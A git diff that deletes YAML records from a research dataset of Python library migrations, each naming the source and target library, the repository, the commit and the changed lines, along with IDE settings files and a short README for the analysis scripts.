a/v1/data/migration/d6cd8df_pyqt5,pyside6.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: d6cd8df_pyqt5,pyside6 -source: pyqt5 -target: pyside6 -repo: toufool/auto-split -commit: d6cd8dfdc93aff7e1ff8763a06a64e20a18a4a33 -pair_id: pyqt5,pyside6 -commit_message: Python 3.9 + PyQt6 -commit_url: https://github.com/toufool/auto-split/commit/d6cd8dfd -code_changes: [] diff --git a/v1/data/migration/d707ff6_gevent,eventlet.yaml b/v1/data/migration/d707ff6_gevent,eventlet.yaml deleted file mode 100644 index 2096ed0..0000000 --- a/v1/data/migration/d707ff6_gevent,eventlet.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: d707ff6_gevent,eventlet -source: gevent -target: eventlet -repo: duanhongyi/dwebsocket -commit: d707ff652fd74c3420e83a50fc9b1b9026ed0d98 -pair_id: gevent,eventlet -commit_message: add py3k support -commit_url: https://github.com/duanhongyi/dwebsocket/commit/d707ff65 -code_changes: -- filepath: examples/run_eventlet.py - lines: - - 14-15:16 - - 3-5:1-2,6 diff --git a/v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml b/v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml deleted file mode 100644 index 9cfae92..0000000 --- a/v1/data/migration/d84b166_python-social-auth,social-auth-app-django.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: d84b166_python-social-auth,social-auth-app-django -source: python-social-auth -target: social-auth-app-django -repo: humanbrainproject/hbp_neuromorphic_platform -commit: d84b1668c85c9b57f0a5269b7b5ff72f2ff73808 -pair_id: python-social-auth,social-auth-app-django -commit_message: Updated from python-social-auth (deprecated) to social-auth-app-django -commit_url: https://github.com/humanbrainproject/hbp_neuromorphic_platform/commit/d84b1668 -code_changes: [] diff --git a/v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml b/v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml deleted file mode 100644 index 8f74af8..0000000 --- a/v1/data/migration/d8dedc7_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: d8dedc7_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: quantopian/penguindome -commit: d8dedc77ff5e30350733ac2517334d458db3efb2 -pair_id: pycrypto,pycryptodome -commit_message: 'Replace pycrypto with pycryptodome - - - Pycryptodome is a drop-in replacement for pycrypto, and pycrypto is no - - longer being maintained and has known security issues (though none - - them actually impact how we use it), so we might as well replace - - pycrypto with pycryptodome.' -commit_url: https://github.com/quantopian/penguindome/commit/d8dedc77 -code_changes: [] diff --git a/v1/data/migration/dac43f8_gunicorn,waitress.yaml b/v1/data/migration/dac43f8_gunicorn,waitress.yaml deleted file mode 100644 index 2534f16..0000000 --- a/v1/data/migration/dac43f8_gunicorn,waitress.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: dac43f8_gunicorn,waitress -source: gunicorn -target: waitress -repo: covidzero/hummingbird-v2 -commit: dac43f81346d1b23752698cf53d8fb9be721993b -pair_id: gunicorn,waitress -commit_message: change from gunicorn to waitress (#85) -commit_url: https://github.com/covidzero/hummingbird-v2/commit/dac43f81 -code_changes: [] diff --git a/v1/data/migration/db7f132_flask,quart.yaml b/v1/data/migration/db7f132_flask,quart.yaml deleted file mode 100644 index 07e3092..0000000 --- a/v1/data/migration/db7f132_flask,quart.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: db7f132_flask,quart -source: flask -target: quart -repo: learningorchestra/learningorchestra -commit: db7f1321e13b5386f94670537aa49943f0f0cec9 -pair_id: flask,quart -commit_message: adding quart to make async requests -commit_url: https://github.com/learningorchestra/learningorchestra/commit/db7f1321 -code_changes: -- filepath: microservices/projection_image/server.py - lines: - - '1:1' - - '33:33' diff --git a/v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml b/v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml deleted file mode 100644 index 98bd145..0000000 --- a/v1/data/migration/dcd48ef_fuzzywuzzy,rapidfuzz.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: dcd48ef_fuzzywuzzy,rapidfuzz -source: fuzzywuzzy -target: rapidfuzz -repo: nlpia/nlpia-bot -commit: dcd48ef24e6b879ff46ad6d4a70a872cfb31a936 -pair_id: fuzzywuzzy,rapidfuzz -commit_message: 'use rapidfuzz instead of fuzzywuzzy - - - - Former-commit-id: 15c4727acbe187e9b8eb5ca030027d3ba394f004 [formerly b8155b57812d0a2f5c2cb22e1ed10f1adc8e2476] - - Former-commit-id: a27da32d3a703dd37cbdc1e401540c97c8aabe48 - - Former-commit-id: 5cf1807ded5b5b6c22ed8a70968910a7c99c066f' -commit_url: https://github.com/nlpia/nlpia-bot/commit/dcd48ef2 -code_changes: [] diff --git a/v1/data/migration/dd3b266_urllib,urllib3.yaml b/v1/data/migration/dd3b266_urllib,urllib3.yaml deleted file mode 100644 index 30e983c..0000000 --- a/v1/data/migration/dd3b266_urllib,urllib3.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: dd3b266_urllib,urllib3 -source: urllib -target: urllib3 -repo: jcjorel/clonesquad-ec2-pet-autoscaler -commit: dd3b2664b930544a60dffe749193cc766ddd1a03 -pair_id: urllib,urllib3 -commit_message: (Bug/Minor) Updated Python dependencies to latest versions (Fix GitHub - Dependabot alert about urllib3 version <=1.26.5) -commit_url: https://github.com/jcjorel/clonesquad-ec2-pet-autoscaler/commit/dd3b2664 -code_changes: [] diff --git a/v1/data/migration/dec4ae0_scapy-python3,scapy.yaml b/v1/data/migration/dec4ae0_scapy-python3,scapy.yaml deleted file mode 100644 index d0260c1..0000000 --- a/v1/data/migration/dec4ae0_scapy-python3,scapy.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: dec4ae0_scapy-python3,scapy -source: scapy-python3 -target: scapy -repo: tklab-tud/id2t -commit: dec4ae016d18537f225dd3dac52c70ccdb973d58 -pair_id: scapy-python3,scapy -commit_message: update scapy-python3 to scapy 2.4.2 -commit_url: https://github.com/tklab-tud/id2t/commit/dec4ae01 -code_changes: [] diff --git a/v1/data/migration/df57533_raven,sentry-sdk.yaml b/v1/data/migration/df57533_raven,sentry-sdk.yaml deleted file mode 100644 index 1727f62..0000000 --- a/v1/data/migration/df57533_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: df57533_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: anikalegal/clerk -commit: df57533f6105b3ef513990ede61d8523a3674486 -pair_id: raven,sentry-sdk -commit_message: Add staging environment -commit_url: https://github.com/anikalegal/clerk/commit/df57533f -code_changes: [] diff --git a/v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml b/v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml deleted file mode 100644 index c83a05f..0000000 --- a/v1/data/migration/e192ca6_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: e192ca6_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: hhyo/archery -commit: e192ca69e2d610bc59a9f10165c7fd1c8ab9b157 -pair_id: pycrypto,pycryptodome -commit_message: "\u89E3\u51B3\u5BC6\u7801\u52A0\u5BC6\u53EF\u80FD\u62A5\u9519\u7684\ - \u95EE\u9898" -commit_url: https://github.com/hhyo/archery/commit/e192ca69 -code_changes: -- filepath: sql/utils/aes_decryptor.py - lines: - - '26:26' diff --git a/v1/data/migration/e38ec14_raven,sentry-sdk.yaml b/v1/data/migration/e38ec14_raven,sentry-sdk.yaml deleted file mode 100644 index 6e310f4..0000000 --- a/v1/data/migration/e38ec14_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: e38ec14_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: hypothesis/bouncer -commit: e38ec148f5bad94648d338eea691d44abd4bdf5d -pair_id: raven,sentry-sdk -commit_message: Replace the raven dependency with `h_pyramid_sentry` -commit_url: https://github.com/hypothesis/bouncer/commit/e38ec148 -code_changes: [] diff --git a/v1/data/migration/e418cdc_pil,pillow.yaml b/v1/data/migration/e418cdc_pil,pillow.yaml deleted file mode 100644 index 9d28609..0000000 --- a/v1/data/migration/e418cdc_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: e418cdc_pil,pillow -source: pil -target: pillow -repo: pyav-org/pyav -commit: e418cdc8034dc2dac3379fa28087e739449c1c7d -pair_id: pil,pillow -commit_message: Test using Pillow instead of PIL -commit_url: https://github.com/pyav-org/pyav/commit/e418cdc8 -code_changes: [] diff --git a/v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml b/v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml deleted file mode 100644 index b4a73b2..0000000 --- a/v1/data/migration/e5073e4_pymilvus-orm,pymilvus.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: e5073e4_pymilvus-orm,pymilvus -source: pymilvus-orm -target: pymilvus -repo: milvus-io/bootcamp -commit: e5073e4c0c3e799822e939268d80c8f0601ea4cf -pair_id: pymilvus-orm,pymilvus -commit_message: update video analysis -commit_url: https://github.com/milvus-io/bootcamp/commit/e5073e4c -code_changes: -- filepath: solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py - lines: - - 2-5,7:3 -- filepath: solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py - lines: - - 2-5,7:3 diff --git a/v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml b/v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml deleted file mode 100644 index e2276b1..0000000 --- a/v1/data/migration/e6b17da_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: e6b17da_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: jumpserver/jumpserver -commit: e6b17da57dd2ef030d29894fde7e9340b324776d -pair_id: pycrypto,pycryptodome -commit_message: "perf: \u53BB\u6389pycrypto\u5E93\n\nperf: \u663E\u793A\u6DFB\u52A0\ - pycryptodome" -commit_url: https://github.com/jumpserver/jumpserver/commit/e6b17da5 -code_changes: [] diff --git a/v1/data/migration/e706486_slackclient,slack-sdk.yaml b/v1/data/migration/e706486_slackclient,slack-sdk.yaml deleted file mode 100644 index ad33c35..0000000 --- a/v1/data/migration/e706486_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: e706486_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: ansible/awx -commit: e7064868b43e281bc48dd9edde71d993b52c72b2 -pair_id: slackclient,slack-sdk -commit_message: 'updates the implementation of the slack backend for notifications - - - Use the slack_sdk instead of the deprecated slackclient. Because according to the - official documentation: - - > The slackclient PyPI project is in maintenance mode now and slack-sdk project - is the successor. - - With this commit one UPGRADE BLOCKER from requirements/requirements.in is removed. - Als the license for slack_sdk - - is updated and unit tests for slack notifications backend are added. - - - Signed-off-by: Daniel Ziegenberg ' -commit_url: https://github.com/ansible/awx/commit/e7064868 -code_changes: [] diff --git a/v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml b/v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml deleted file mode 100644 index ed975ca..0000000 --- a/v1/data/migration/e7d4fd5_fuzzywuzzy,rapidfuzz.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: e7d4fd5_fuzzywuzzy,rapidfuzz -source: fuzzywuzzy -target: rapidfuzz -repo: nlpia/nlpia-bot -commit: e7d4fd555779cd407fa5e09e1944b2ba56c5db12 -pair_id: fuzzywuzzy,rapidfuzz -commit_message: 'use rapidfuzz instead of fuzzywuzzy - - - - Former-commit-id: 53c3bce9c5f9bcec87475759fe040289d45ba1d6' -commit_url: https://github.com/nlpia/nlpia-bot/commit/e7d4fd55 -code_changes: [] diff --git a/v1/data/migration/ea23791_raven,sentry-sdk.yaml b/v1/data/migration/ea23791_raven,sentry-sdk.yaml deleted file mode 100644 index 91811e6..0000000 --- a/v1/data/migration/ea23791_raven,sentry-sdk.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: ea23791_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: agdsn/sipa -commit: ea23791cfdc36d614189418a01a57c78859fa5e8 -pair_id: raven,sentry-sdk -commit_message: Use sentry SDK instead of raven -commit_url: https://github.com/agdsn/sipa/commit/ea23791c -code_changes: -- filepath: sipa/initialization.py - lines: - - 186-187:189-194 - - 9-11:8,12 diff --git a/v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml b/v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml deleted file mode 100644 index 6f225e4..0000000 --- a/v1/data/migration/ee4d526_pyyaml,ruamel.yaml.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: ee4d526_pyyaml,ruamel.yaml -source: pyyaml -target: ruamel.yaml -repo: cloud-custodian/cloud-custodian -commit: ee4d52689e1f4965439b2d360c89eddf8767a935 -pair_id: pyyaml,ruamel.yaml -commit_message: tools/c7n_mailer port to py36 (#1417) -commit_url: https://github.com/cloud-custodian/cloud-custodian/commit/ee4d5268 -code_changes: -- filepath: tools/c7n_mailer/c7n_mailer/replay.py - lines: - - '21:21' -- filepath: tools/c7n_mailer/c7n_mailer/utils.py - lines: - - '18:20' -- filepath: tools/c7n_mailer/c7n_mailer/cli.py - lines: - - '8:8' diff --git a/v1/data/migration/f0761b8_scapy-python3,scapy.yaml b/v1/data/migration/f0761b8_scapy-python3,scapy.yaml deleted file mode 100644 index 6ad7f68..0000000 --- a/v1/data/migration/f0761b8_scapy-python3,scapy.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: f0761b8_scapy-python3,scapy -source: scapy-python3 -target: scapy -repo: plizonczyk/noiseprotocol -commit: f0761b888a80201e28adb9fc2f614b997c868127 -pair_id: scapy-python3,scapy -commit_message: 'Update scapy - - - scapy-python3 is an unofficial fork that is getting very oudated (many bug fixes - missing). - - Migrates to original and up-to-date scapy, which now supports both python 2 and - 3' -commit_url: https://github.com/plizonczyk/noiseprotocol/commit/f0761b88 -code_changes: [] diff --git a/v1/data/migration/f08e9f1_mysql-python,pymysql.yaml b/v1/data/migration/f08e9f1_mysql-python,pymysql.yaml deleted file mode 100644 index 13a2d1c..0000000 --- a/v1/data/migration/f08e9f1_mysql-python,pymysql.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: f08e9f1_mysql-python,pymysql -source: mysql-python -target: pymysql -repo: openstack/neutron -commit: f08e9f1f53efa97e07f21ca72a940fcbeb4570e5 -pair_id: mysql-python,pymysql -commit_message: 'Switch from MySQL-python to PyMySQL - - - As discussed in the Liberty Design Summit "Moving apps to Python 3" - - cross-project workshop, the way forward in the near future is to - - switch to the pure-python PyMySQL library as a default. - - - https://etherpad.openstack.org/p/liberty-cross-project-python3 - - - Change-Id: I73e0fdb6eca70e7d029a40a2f6f17a7c0797a21d' -commit_url: https://github.com/openstack/neutron/commit/f08e9f1f -code_changes: [] diff --git a/v1/data/migration/f1120d3_raven,sentry-sdk.yaml b/v1/data/migration/f1120d3_raven,sentry-sdk.yaml deleted file mode 100644 index d75f563..0000000 --- a/v1/data/migration/f1120d3_raven,sentry-sdk.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: f1120d3_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: pokainc/cfn-cross-region-export -commit: f1120d34c2a71686e769995300ac7cf09f858e34 -pair_id: raven,sentry-sdk -commit_message: 'Feat - Switch from SSM to outputs + SAM (#20) - - - * Feat - Switch from SSM to outputs + SAM - - - * Code Review - Tweak sentry + Remove unused - - - * Update exporter/lambda/cross_region_import_replication.py - - - Co-authored-by: Laurent Jalbert-Simard - - - * Update exporter/lambda/cross_region_import_replication.py - - - Co-authored-by: Laurent Jalbert-Simard - - - * Code Review - Change naming - - - Co-authored-by: Laurent Jalbert-Simard ' -commit_url: https://github.com/pokainc/cfn-cross-region-export/commit/f1120d34 -code_changes: -- filepath: exporter/lambda/cross_region_import_replication.py - lines: - - 21-25:11 - - 8-9:8-9 diff --git a/v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml b/v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml deleted file mode 100644 index b755e75..0000000 --- a/v1/data/migration/f5ba90e_pyyaml,ruamel.yaml.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: f5ba90e_pyyaml,ruamel.yaml -source: pyyaml -target: ruamel.yaml -repo: holgern/beem -commit: f5ba90e2cc5bb88b29b173bae11ba46e06efecf7 -pair_id: pyyaml,ruamel.yaml -commit_message: Switch to ruamel.yaml -commit_url: https://github.com/holgern/beem/commit/f5ba90e2 -code_changes: -- filepath: beem/utils.py - lines: - - '9:9' diff --git a/v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml b/v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml deleted file mode 100644 index 2dd1919..0000000 --- a/v1/data/migration/f6230c7_py-bcrypt,bcrypt.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: f6230c7_py-bcrypt,bcrypt -source: py-bcrypt -target: bcrypt -repo: weasyl/weasyl -commit: f6230c731f662be1301bdc38f6ab9815c7441144 -pair_id: py-bcrypt,bcrypt -commit_message: Implements pyca/bcrypt -commit_url: https://github.com/weasyl/weasyl/commit/f6230c73 -code_changes: -- filepath: weasyl/login.py - lines: - - 76:77 - - 284:285 diff --git a/v1/data/migration/f69877c_python-ldap,ldap3.yaml b/v1/data/migration/f69877c_python-ldap,ldap3.yaml deleted file mode 100644 index f464d8f..0000000 --- a/v1/data/migration/f69877c_python-ldap,ldap3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: f69877c_python-ldap,ldap3 -source: python-ldap -target: ldap3 -repo: thehive-project/cortex-analyzers -commit: f69877cf2f81aa27b63e2c3c3f1072a6868aba4a -pair_id: python-ldap,ldap3 -commit_message: use ldap3, add port/search_field, move templates -commit_url: https://github.com/thehive-project/cortex-analyzers/commit/f69877cf -code_changes: [] diff --git a/v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml b/v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml deleted file mode 100644 index 2b79095..0000000 --- a/v1/data/migration/f7d2ea4_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: f7d2ea4_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: uclapi/uclapi -commit: f7d2ea4679405d7693ca8cd00992f11f1a2202ae -pair_id: raven,sentry-sdk -commit_message: ':sparkles: Migrate to Sentry' -commit_url: https://github.com/uclapi/uclapi/commit/f7d2ea46 -code_changes: [] diff --git a/v1/data/migration/f970b54_pil,pillow.yaml b/v1/data/migration/f970b54_pil,pillow.yaml deleted file mode 100644 index e684280..0000000 --- a/v1/data/migration/f970b54_pil,pillow.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: f970b54_pil,pillow -source: pil -target: pillow -repo: rcos/observatory-retired -commit: f970b543dc349460492a32a11731738062bfcc09 -pair_id: pil,pillow -commit_message: Go to Pillow for images since PIL isn't updated -commit_url: https://github.com/rcos/observatory-retired/commit/f970b543 -code_changes: -- filepath: observatory/dashboard/models/Screenshot.py - lines: - - '15:15' diff --git a/v1/data/migration/fe6b437_pil,pillow.yaml b/v1/data/migration/fe6b437_pil,pillow.yaml deleted file mode 100644 index e560451..0000000 --- a/v1/data/migration/fe6b437_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: fe6b437_pil,pillow -source: pil -target: pillow -repo: henrysky/astronn -commit: fe6b4379c5d84495cb30af0ad50931c871129f0f -pair_id: pil,pillow -commit_message: pillow not PIL [ci skip] -commit_url: https://github.com/henrysky/astronn/commit/fe6b4379 -code_changes: [] diff --git a/v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml b/v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml deleted file mode 100644 index ffe68c3..0000000 --- a/v1/data/migration/fe8e65d_dotenv,python-dotenv.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: fe8e65d_dotenv,python-dotenv -source: dotenv -target: python-dotenv -repo: kaveio/kavetoolbox -commit: fe8e65df6d05e3818627638104d3ca0730753657 -pair_id: dotenv,python-dotenv -commit_message: Changing dotenv to python-dotenv -commit_url: https://github.com/kaveio/kavetoolbox/commit/fe8e65df -code_changes: [] diff --git a/v2/code/.idea/.gitignore b/v2/code/.idea/.gitignore deleted file mode 100644 index 73f69e0..0000000 --- a/v2/code/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# Default ignored files -/shelf/ -/workspace.xml -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml -# Editor-based HTTP Client requests -/httpRequests/ diff --git a/v2/code/.idea/PyMigStat.iml b/v2/code/.idea/PyMigStat.iml deleted file mode 100644 index dc31529..0000000 --- a/v2/code/.idea/PyMigStat.iml +++ /dev/null @@ -1,23 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/v2/code/.idea/inspectionProfiles/Project_Default.xml b/v2/code/.idea/inspectionProfiles/Project_Default.xml deleted file mode 100644 index ee20a26..0000000 --- a/v2/code/.idea/inspectionProfiles/Project_Default.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - \ No newline at end of file diff --git a/v2/code/.idea/inspectionProfiles/profiles_settings.xml b/v2/code/.idea/inspectionProfiles/profiles_settings.xml deleted file mode 100644 index dd4c951..0000000 --- a/v2/code/.idea/inspectionProfiles/profiles_settings.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - \ No newline at end of file diff --git a/v2/code/.idea/misc.xml b/v2/code/.idea/misc.xml deleted file mode 100644 index 94865c7..0000000 --- a/v2/code/.idea/misc.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/v2/code/.idea/modules.xml b/v2/code/.idea/modules.xml deleted file mode 100644 index b868114..0000000 --- a/v2/code/.idea/modules.xml +++ /dev/null @@ -1,8 +0,0 @@ - - - - - - - - \ No newline at end of file diff --git a/v2/code/.idea/other.xml b/v2/code/.idea/other.xml deleted file mode 100644 index 640fd80..0000000 --- a/v2/code/.idea/other.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - \ No newline at end of file diff --git a/v2/code/.idea/vcs.xml b/v2/code/.idea/vcs.xml deleted file mode 100644 index 6c0b863..0000000 --- a/v2/code/.idea/vcs.xml +++ /dev/null @@ -1,6 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/v2/code/README.md b/v2/code/README.md deleted file mode 100644 index cfe37f5..0000000 --- a/v2/code/README.md +++ /dev/null @@ -1,20 +0,0 @@ -This was moved to here. The previous history can be found at https://github.com/ualberta-smr/PyMigStat. - -THe below part is outdated. -# PyMigrationStat -Scripts for various analysis of Python migrations - -# External dependencies -1. git -2. rust code analysis CLI -3. PyFlakes - -# Sequence for a full run -1. CollectLibInfo.py -2. FetchRepoList.py -3. CreateRepoFiles.py -4. download-repos.py -5. CollectDependencyEvents.py -6. CollectMigrations.py - - diff --git a/v2/code/pymigstat/runnables/__init__.py b/v2/code/pymigstat/runnables/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/v2/code/pymigstat/taxonomy/__init__.py b/v2/code/pymigstat/taxonomy/__init__.py deleted file mode 100644 index e69de29..0000000